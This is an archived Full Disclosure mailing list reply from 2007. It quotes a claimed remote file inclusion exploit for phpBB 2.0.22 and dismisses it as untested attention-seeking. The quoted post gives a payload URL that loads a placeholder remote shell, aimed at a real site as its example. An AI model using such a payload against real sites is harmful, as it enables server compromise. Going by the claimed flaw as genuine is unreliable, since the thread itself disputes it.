Full Disclosure mailing list archives

Re: 0DAY RFI in phpBB <= 2.0.22 HOT

From: <hardened-php () hushmail com>
Date: Sat, 02 Jun 2007 04:14:19 -0400

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

"New bug found in phpBB, most pages vulnerable, theres more bugs,
I\'ll post one a week:

victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.sh
ell]%00

For example:

http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[rem
ote.shell]%00

Enjoy :)

BUG BY REZEN! XORCREW! H4X H4X!"

Did you even read the code rezen? test your "vuln"? How about you
test what you find instead of posting everything you see to the
list and trying to get attention/fame? Leave vuln assessment/code
auditing to people who actually care about it, and stop playing as
one.
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkZhJdIACgkQMe2+mPigEXJ5awP+Iqd9pRIypATEnM1K7ZhpAjxPgJeY
NedFd4Dkf6EgeQFy0zY2qGHM24CrbHO27bfsM2tRbUIdxUbGjD+f5pQ1hGjEF0Mg6Jw0
cBoER8jhWMiZZRxlseaKtkL7t8iF4DsZq5OIdrbHEm4oGpudHE0FKpJFyLsR8Tk85ziA
Icd6qcQ=
=Rhg/
-----END PGP SIGNATURE-----

--
Prices, software, charts & analysis.  Click here to open your online FX trading account.
http://tagline.hushmail.com/fc/CAaCXv1QmGxJYt2brAIxTpm5SofhvHbE/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

0DAY RFI in phpBB <= 2.0.22 HOT dr . rezen (Jun 01)
- Re: 0DAY RFI in phpBB <= 2.0.22 HOT Slythers Bro (Jun 01)
- <Possible follow-ups>
- Re: 0DAY RFI in phpBB <= 2.0.22 HOT hardened-php (Jun 02)
- Re: 0DAY RFI in phpBB <= 2.0.22 HOT Ashley Pinner (Jun 02)